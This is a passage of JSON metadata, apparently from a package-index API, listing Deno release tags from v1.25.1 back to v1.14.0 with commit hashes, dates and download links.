ositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at"